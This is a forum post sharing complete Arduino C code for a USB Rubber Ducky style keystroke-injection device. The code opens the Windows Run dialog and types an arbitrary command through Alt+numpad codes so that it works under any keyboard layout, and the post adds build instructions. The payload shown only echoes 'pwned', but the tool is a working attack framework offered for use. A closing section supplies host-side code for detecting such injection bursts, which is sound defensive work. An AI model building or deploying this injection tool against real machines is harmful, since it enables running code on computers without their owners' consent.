USB Rubber Ducky - C

  • Thread starter Kisame
Kisame Hoshigaki
 
Hello, hello, I'd like to share my work on the USB Rubber Ducky. Let's start with the theory.

The concept of the USB Rubber Ducky attack is to emulate a keyboard. There are plenty of simple PoCs on the Internet:
reverse shell, UAC bypass (not to be confused with LPE), etc. I want to present to you, in a sense, a modified idea.
My code supports any keyboard layout, even if there is no English layout on the target machine, enables NumLock automatically,
and overall the code came out pretty cool.

The complete code will be at the end of the article, but now we will analyze its parts.

When our 'keyboard' is connected, the system sends it the state of CapsLock, ScrollLock and NumLock. We need the last one:
we check whether it is turned on, and if not, we send the keystroke that turns it on. We will need it later.



C:
if (!(BootKeyboard.getLeds() & LED_NUM_LOCK)) BootKeyboard.write(KEY_NUM_LOCK);
delay(1500);

Here, as usual, we open the Run dialog.

C:
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(2500);
Keyboard.write(KEY_BACKSPACE);
delay(500);


The last part of the code enters characters using Alt + (ASCII code). Everything is simple there: we take the ASCII code of the character and split it into its decimal digits. Since we get the digits in reverse order, we enter them back to front, so it comes out reversed twice)

C:
do {
  int symbol = *command++;
  while (symbol) {
    _symbols[_count++] = symbol % 10;
    symbol /= 10;
  }
  Keyboard.press(KEY_LEFT_ALT);
  delay(15);
  while (_count-- > 0) {
    write_numpad_digit(_symbols[_count]);
    delay(5);
  }
  Keyboard.release(KEY_LEFT_ALT);
  delay(5);
  Keyboard.releaseAll();
  _count = 0;
  delay(5);
} while (*command != 0);


The full code. To compile it you need an Arduino Pro Micro board, which costs 200 rubles, and the Arduino IDE. Do not forget to install the HID library in the IDE.

C:
#include "HID-Project.h"
#define PAYLOAD "cmd.exe /c echo pwned & pause"

// Tap the numpad key for one decimal digit (0-9).
void write_numpad_digit(int num) {
  switch (num) {
    case 0: Keyboard.write(KEYPAD_0); break;
    case 1: Keyboard.write(KEYPAD_1); break;
    case 2: Keyboard.write(KEYPAD_2); break;
    case 3: Keyboard.write(KEYPAD_3); break;
    case 4: Keyboard.write(KEYPAD_4); break;
    case 5: Keyboard.write(KEYPAD_5); break;
    case 6: Keyboard.write(KEYPAD_6); break;
    case 7: Keyboard.write(KEYPAD_7); break;
    case 8: Keyboard.write(KEYPAD_8); break;
    case 9: Keyboard.write(KEYPAD_9); break;
  }
}

void setup() {
  const char* command = PAYLOAD;
  BootKeyboard.begin();
  delay(1300);
  // enable NumLock if the host reports it as off
  if (!(BootKeyboard.getLeds() & LED_NUM_LOCK)) BootKeyboard.write(KEY_NUM_LOCK);
  delay(1500);

  // open the Run dialog and clear its input field
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(2500);
  Keyboard.write(KEY_BACKSPACE);
  delay(500);

  int _count = 0;
  int _symbols[5];
  do {
    // split the character code into decimal digits (least significant first)
    int symbol = *command++;
    while (symbol) {
      _symbols[_count++] = symbol % 10;
      symbol /= 10;
    }
    // hold Alt and enter the digits on the numpad, most significant first
    Keyboard.press(KEY_LEFT_ALT);
    delay(15);
    while (_count-- > 0) {
      write_numpad_digit(_symbols[_count]);
      delay(5);
    }
    Keyboard.release(KEY_LEFT_ALT);
    delay(5);
    Keyboard.releaseAll();
    _count = 0;
    delay(5);
  } while (*command != 0);
  delay(50);
  Keyboard.write(KEY_RETURN);
}

void loop() {
  return;
}
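
Seen from the host, the sketch above has a distinctive timing signature: every character arrives as an Alt+numpad code whose digits are only a few milliseconds apart, far faster than hand typing. The following is an added example, not part of the original post, that counts such bursts in a key-event log. The event structure, the thresholds and the sample data are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <stddef.h>

/* Assumed event model (hypothetical): one record per key transition with a
   millisecond timestamp, as a host-side input monitor could log it. */
enum key_kind { K_OTHER, K_ALT_DOWN, K_ALT_UP, K_NUMPAD_DOWN };
struct key_event { unsigned long t_ms; enum key_kind kind; };
#define HUMAN_MIN_GAP_MS 30 /* assumed floor for hand-typed numpad digits */
#define ALERT_ALT_CODES 3   /* assumed count of fast Alt codes that alerts */
#define LEN(a) (sizeof(a) / sizeof((a)[0]))

/* Count Alt codes whose every gap (Alt to digit, digit to digit) is too short. */
int count_fast_alt_codes(const struct key_event *ev, size_t n) {
    int fast = 0, in_alt = 0, digits = 0, all_fast = 0;
    unsigned long prev = 0;
    for (size_t i = 0; i < n; i++) {
        if (ev[i].kind == K_ALT_DOWN) {
            in_alt = 1; digits = 0; all_fast = 1; prev = ev[i].t_ms;
        } else if (ev[i].kind == K_NUMPAD_DOWN && in_alt) {
            if (ev[i].t_ms - prev >= HUMAN_MIN_GAP_MS) all_fast = 0;
            digits++; prev = ev[i].t_ms;
        } else if (ev[i].kind == K_ALT_UP) {
            if (in_alt && digits >= 2 && all_fast) fast++;
            in_alt = 0;
        } else {
            in_alt = 0; /* any other key breaks the Alt-code pattern */
        }
    }
    return fast;
}
int injection_suspected(const struct key_event *ev, size_t n) {
    return count_fast_alt_codes(ev, n) >= ALERT_ALT_CODES;
}
/* Constructed samples, not captured data. Three Alt codes, gaps under 20 ms: */
static const struct key_event machine_like[] = {
    {0, K_ALT_DOWN}, {16, K_NUMPAD_DOWN}, {23, K_NUMPAD_DOWN}, {30, K_ALT_UP},
    {42, K_ALT_DOWN}, {58, K_NUMPAD_DOWN}, {65, K_NUMPAD_DOWN},
    {72, K_NUMPAD_DOWN}, {79, K_ALT_UP},
    {91, K_ALT_DOWN}, {107, K_NUMPAD_DOWN}, {114, K_NUMPAD_DOWN},
    {121, K_NUMPAD_DOWN}, {128, K_ALT_UP} };
/* One Alt code typed by hand, gaps of roughly 200 ms: */
static const struct key_event human_like[] = {
    {0, K_ALT_DOWN}, {210, K_NUMPAD_DOWN}, {395, K_NUMPAD_DOWN},
    {580, K_NUMPAD_DOWN}, {770, K_NUMPAD_DOWN}, {900, K_ALT_UP} };
int main(void) {
    printf("machine_like alert=%d\n", injection_suspected(machine_like, LEN(machine_like)));
    printf("human_like alert=%d\n", injection_suspected(human_like, LEN(human_like)));
    return 0;
}
```

Both thresholds would need tuning against real input telemetry before use. Timing is only one signal and works best combined with alerting on a new HID keyboard enumerating shortly before the burst.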
 